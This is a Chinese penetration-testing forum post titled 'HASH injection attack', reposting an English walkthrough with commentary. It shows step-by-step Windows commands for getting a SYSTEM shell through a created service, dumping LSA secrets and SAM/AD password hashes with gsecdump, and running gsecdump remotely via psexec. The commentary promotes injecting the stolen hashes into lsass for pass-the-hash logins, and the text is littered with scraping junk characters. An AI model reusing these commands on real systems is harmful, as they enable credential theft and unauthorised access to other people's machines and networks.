找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 HASH注入式攻击
返回列表 发新帖
查看: 2639|回复: 0
打印 上一主题 下一主题

HASH注入式攻击

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-11-6 21:09:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
o get a DOS Prompt as NT system:: Y3 t* A/ c) y7 y+ o6 n
) a, N. Y! T1 Y( f4 C
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
+ ^% \8 z2 [5 n+ H[SC] CreateService SUCCESS4 ?& _8 @5 K4 y2 x3 e/ w! k3 @
: m! S& \* u! _9 Z6 I
C:\>sc start shellcmdline% Q: ^9 }& v# m$ N" `
[SC] StartService FAILED 1053:
" u) }& i4 ^) K% v. |! h/ O5 V: E. I+ j* y  d$ s6 \+ A2 H  i
The service did not respond to the start or control request in a timely fashion.- S5 d9 S+ K( v# g6 }3 y# r, m
6 y6 W9 k; v( y) |8 o% v- ^1 k4 i
C:\>sc delete shellcmdline* A1 g/ f. w0 e3 l* H) [
[SC] DeleteService SUCCESS
1 h0 R: P1 a# [) h. v& A; Z
6 |0 L* G2 v8 B! Y# O------------, C4 X$ P1 U2 s- a( J3 ?

7 o! H" N1 h8 y! L9 uThen in the new DOS window:
6 \/ s3 L/ @) R+ t  _0 `6 w! }; V) K8 p( o
: }! _7 G( P: Y) k7 T" PMicrosoft Windows XP [Version 5.1.2600]
& V: K, O. c0 r(C) Copyright 1985-2001 Microsoft Corp.  y$ W5 b. z$ I( ~/ H

8 ?) y+ {# v3 \C:\WINDOWS\system32>whoami9 Y$ t6 a7 w9 k! d: z/ J
NT AUTHORITY\SYSTEM
/ y# ~2 U! d( f* u* t
- H. Q+ G- k& h+ f& FC:\WINDOWS\system32>gsecdump -h
  A* I& k* J& y* {# Wgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
& w& k  B% G, [' @usage: gsecdump [options]( |8 m: ~! V, R8 L3 |. `& k8 T
5 d0 {% N. ~1 J: u3 G$ B1 x5 p; L8 P
options:& Q; J# ~' g% a% f% V) x
-h [ --help ] show help
2 }8 x: w& x, e0 _* r+ o+ g( J, |-a [ --dump_all ] dump all secrets
% R% Y: S+ w# _# o9 N+ n7 \-l [ --dump_lsa ] dump lsa secrets
. p& w4 T& x9 K! k% h: q( ^7 C0 t-w [ --dump_wireless ] dump microsoft wireless connections
* I( y5 e( n! _0 V- V-u [ --dump_usedhashes ] dump hashes from active logon sessions. v. m; S- `- ?
-s [ --dump_hashes ] dump hashes from SAM/AD' s2 i, e& W5 {$ R: ^" F% I
2 C0 N3 ]2 K/ |5 o  \+ E
Although I like to use:6 t1 S  i4 M# K1 b, o, A# V) g
( x2 n& r& G0 G5 N; Y( Q6 Q
PsExec v1.83 - Execute processes remotely& T& H7 m$ ]' }8 W
Copyright (C) 2001-2007 Mark Russinovich! x% P6 e5 M0 J" ]  K/ L
Sysinternals - 链接标记[url]www.sysinternals.com[/url]5 n$ c" w. n$ L# h  @7 z
3 E: x- m, B1 P2 @7 |% ]7 h( M
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
, X' Z# c( q; v4 h: H6 S
: P6 T" d+ `; n3 G7 n& y& cto get the hashes from active logon sessions of a remote system.3 `7 ]  q8 Q0 i' w" F/ Y

( U) V0 a' j& M: f9 j8 a( Z! k& q+ ^2 JThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables./ F" O2 L9 v9 H! j! D6 F

$ p9 E; q0 R( A/ w2 s提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.# ~& u' N! g+ D, X# G1 w8 B
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]2 O7 j0 ]' H+ P, ~9 F

9 ?. n8 d, W8 C8 B: K' u' V我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。  ], L3 O, \& \; `  J
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表